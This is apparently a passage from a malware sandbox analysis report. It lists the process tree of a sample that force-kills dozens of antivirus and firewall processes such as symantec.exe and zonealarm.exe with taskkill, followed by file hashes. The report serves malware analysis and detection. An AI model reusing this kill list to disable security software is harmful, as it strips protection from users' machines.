C:\Windows\SysWOW64\taskkill.exetaskkill /f /im st2.exe3⤵PID:1896
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im supftrl.exe3⤵PID:1892
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im supp95.exe3⤵PID:1908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im supporter5.exe3⤵PID:1568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sweep95.exe3⤵PID:2108
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sweepnet.exe3⤵PID:1420
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sweepsrv.sys.exe3⤵PID:560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sweepsrv.sysvshwin32.exe3⤵
- Kills process with taskkill
PID:892
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im swnetsup.exe3⤵PID:1644
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im symantec.exe3⤵PID:1532
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Symantec Core LC.exe3⤵PID:276
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im symlcsvc.exe3⤵PID:1480
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im symproxysvc.exe3⤵
- Kills process with taskkill
PID:2588
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im symtray.exe3⤵PID:1684
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sysedit.exe3⤵PID:2980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmon.exe3⤵PID:2812
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taumon.exe3⤵PID:2644
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tauscan.exe3⤵
- Kills process with taskkill
PID:2500
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tbscan.exe3⤵PID:2416
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tcm.exe3⤵PID:2504
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tctca.exe3⤵PID:2116
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tds -3.exe3⤵PID:2492
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tds2 -98.exe3⤵PID:2072
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tds2 -nt.exe3⤵PID:768
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tfak.exe3⤵PID:1836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tfak5.exe3⤵PID:2704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tgbob.exe3⤵PID:2632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im trendmicro.exe3⤵PID:2580
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im trjscan.exe3⤵PID:2260
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im trojantrap3.exe3⤵PID:2756
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im TrueVector.exe3⤵PID:1580
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im undoboot.exe3⤵PID:2028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im update.exe3⤵PID:2020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vbcmserv.exe3⤵PID:2040
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vbcons.exe3⤵PID:2304
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vbust.exe3⤵PID:2628
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vbwin9x.exe3⤵PID:1968
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vbwinntw.exe3⤵PID:2856
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vccmserv.exe3⤵PID:2356
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vcontrol.exe3⤵PID:3028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vet32.exe3⤵PID:672
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vet95.exe3⤵PID:1028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vettray.exe3⤵PID:1056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vir -help.exe3⤵PID:1128
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im virus.exe3⤵PID:2764
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im virusmdpersonalfirewall.exe3⤵PID:884
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vnlan300.exe3⤵
- Kills process with taskkill
PID:1884
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vnpc3000.exe3⤵PID:3032
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vpc32.exe3⤵PID:1632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vpfw30s.exe3⤵PID:832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vptray.exe3⤵PID:3064
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vscan40.exe3⤵PID:2152
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vsched.exe3⤵PID:1832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vsecomr.exe3⤵PID:2136
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vshwin32.exe3⤵PID:1920
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vshwin32vbcmserv.exe3⤵PID:1704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vsmain.exe3⤵PID:1248
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vsmon.exe3⤵
- Kills process with taskkill
PID:864
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vsstat.exe3⤵PID:1924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vswin9xe.exe3⤵PID:1548
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im vswinntse.exe3⤵PID:2944
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im w9x.exe3⤵PID:1300
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im watchdog.exe3⤵PID:1724
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im webscanx.exe3⤵PID:2464
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im webtrap.exe3⤵PID:3068
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wfindv32.exe3⤵PID:2248
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wgfe95.exe3⤵PID:3048
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im whoswatchingme.exe3⤵PID:2480
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wimmun32.exe3⤵PID:1244
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winrecon.exe3⤵PID:2596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winroute.exe3⤵
- Kills process with taskkill
PID:2516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winsfcm.exe3⤵PID:2376
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wnt.exe3⤵PID:2420
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wqkmm3878.exe3⤵PID:2372
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wradmin.exe3⤵PID:2492
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wrctrl.exe3⤵PID:2444
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wsbgate.exe3⤵PID:1544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wyvernworksfirewall.exe3⤵PID:2704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zapro.exe3⤵
- Kills process with taskkill
PID:2632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zatutor.exe3⤵PID:2580
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zauinst.exe3⤵PID:2260
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im zonealarm.exe3⤵PID:2756
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
18KB
MD55802e0955b0dc03e3da99a6c1a8dfe1d
SHA159530d269f3879d79485651589da1a4193d169e2
SHA256c9971c24822da1096ef1c8445343ffbecaa13ccb3af0feecd04633db9a57ab8c
SHA512f501ec89ba3ff3fb913dd06b3b020a9ad722c6599246179c414beda701dea216877601a78334b1e61eb42833cd00c1ccab9b36af1bbd6b80a2ccd1b190ee0d00